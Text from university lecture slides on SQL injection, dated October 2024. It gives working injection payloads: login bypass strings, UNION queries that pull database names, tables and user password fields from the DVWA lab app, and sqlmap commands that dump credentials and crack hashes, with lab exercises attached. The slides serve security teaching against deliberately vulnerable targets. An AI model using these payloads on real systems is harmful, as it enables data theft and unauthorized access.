15/10/2024
Lecturer: Nguyễn Thị Thanh Vân – FIT - HCMUTE
SQL Injection attacks
o Example
Damn Vulnerable Web App – DVWA
o Examples
Sqlmap
o Examples
15/10/2024 2
1
� 15/10/2024
SQL Injections can do more harm than just by passing
the login algorithms. Some of the attacks include
o Deleting data
o Updating data
o Inserting data
o Executing commands on the server that can download and
install malicious programs such as Trojans
o Exporting valuable data such as credit card details, email, and
passwords to the attacker’s remote server
o Getting user login details etc
15/10/2024 3
Crack username/password
o SQL query:
SELECT * FROM Users WHERE Username='$username' AND
Password='$password‘
o Type:
$username = 1' or '1' = '1$password = 1' or '1' = '1
o The query will be:
SELECT * FROM Users WHERE Username='1' OR '1' = '1'
AND Password='1' OR '1' = '1'
=> always true (OR 1=1) => the system has authenticated the user
without knowing the username and password.
15/10/2024 4
2
� 15/10/2024
SQL query:
SELECT * FROM products WHERE id_product=$id_product
ex:
http://www.example.com/product.php?id=10
Using the operators AND and OR.
SELECT * FROM products WHERE id_product=10 AND 1=2
Ex:
http://www.example.com/product.php?id=10 AND 1=2
=> there is no content available or a blank page.
Then, send a true statement and check if there is a valid result:
Ex: http://www.example.com/product.php?id=10 AND 1=1
15/10/2024 5
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web
application that is damn vulnerable. Its main goals are to be an aid for
security professionals to test
1.1 Download DVWA
1.2 Create database and user in DVWA
1.3 Config DVWA
1.4 Setup basic database in DVWA
1.5 Access DVWA
http://10.0.0.2/login.php
Set DVWA Security Level: Low, Medium, High
o SQL Injection
o SQL Injection (Blind)
15/10/2024 6
3
� 15/10/2024
15/10/2024 7
15/10/2024 8
4
� 15/10/2024
Basic Injection: 1
Always True Scenario: %' or '0'='0
Display Database Version :
o %' or 0=0 union select null, version() #
Display Database User:
o %' or 0=0 union select null, user() #
Display Database Name
o %' or 0=0 union select null, database() #
Display all tables in information_schema
o %' and 1=0 union select null, table_name from
information_schema.tables #
15/10/2024 9
Display all the user tables in information_schema
o %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%'#
Display all the columns fields in the information_schema
user table
o %' and 1=0 union select null,
concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #
Display all the columns field contents in the
information_schema user table
o %' and 1=0 union select null,
concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from
users #
15/10/2024 10
5
� 15/10/2024
Get important information in DVWA database: user/pass
with different level:
o Low
o Medium
o High
15/10/2024 11
sqlmap is an open source penetration testing tool that
automates the process of
o detecting and exploiting SQL injection flaws
o taking over of database servers.
It comes with a kick-ass detection engine
Many niche features
o the ultimate penetration tester
o a broad range of switches lasting from database fingerprinting,
o over data fetching from the database,
o to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.
Download and install Sqlmap
http://sqlmap.sourceforge.net/doc/README.html#s1
15/10/2024 12
6
� 15/10/2024
Open firefox: add Tamper Data to Tool
o Select Tool\Tamper Data
o Start Tamper Data
Or: using F12 to open
Ex, Show in DVWA:
15/10/2024 13
Run SQL injection
Prepare: Tamper with request
o Copying the Referer URL (Ref)
Ex: “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”
o Copying the Cookie Information (Coo)
Ex: “PHPSESSID=lpb5g4uss9kp70p8jccjeks621;
set security=low”
Run sqlmap to obtain the following pieces of information
o Obtain Database User For DVWA. Syntax:
./sqlmap.py -u <Ref> --cookie=<Coo> -b --current-db --current-user
o Ex: ./sqlmap.py -u
"http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --
cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b
--current-db --current-user
Do you want to keep testing? Y => Result
15/10/2024 14
7
� 15/10/2024
Run sqlmap
o Obtain Database Management Username and Password. Syntax:
./sqlmap.py –u <ref> --cookie=<Coo> --string="Surname" --users
--password
Use Dictionary Attack? Y
Dictionary Location? <Press Enter>
o Obtain db_hacker Database Privileges. Syntax:
./sqlmap.py –u <ref> --cookie=<Coo> -U db_hacker –privileges
o Obtain a list of all databases.
./sqlmap.py –u <ref> --cookie=<Coo> --dbs
o Obtain "dvwa" tables and contents
./sqlmap.py –u <ref> --cookie=<Coo> -D dvwa --tables
o Obtain columns for table dvwa.users
./sqlmap.py –u <ref> -- cookie=<Coo> -D dvwa -T users --columns15
Run sqlmap
o Obtain Users and their Passwords from table dvwa.users. Syntax:
./sqlmap.py –u <ref> --cookie=<Coo> -D dvwa -T users -C
user,password --dump
Do you want to use the LIKE operator? Y
Recognize possible HASH values? Y
What's the dictionary location? <Press Enter>
Use common password suffixes? y
16
8
� 15/10/2024
use sqlmap to obtain the following pieces of information:
o A list of Database Management Usernames and Passwords.
o A list of databases
o A list of tables for a specified database
o A list of users and passwords for a specified database table.
15/10/2024 17
1. DVWA: SQL Injection, SQL Injection Blind (2)
o Get important information in DVWA database such as: tables,
user/pass with different level: Low, Medium, High
2. Sqlmap: (2)
o Get important information in DVWA database: tables, user/pass
with different level: Low, Medium, High
o Database from other website, ex:
• http://testphp.vulnweb.com
3. Other Tools: (1)
o Hackbar (built-in web browser) -> vulnerable website.
15/10/2024 18
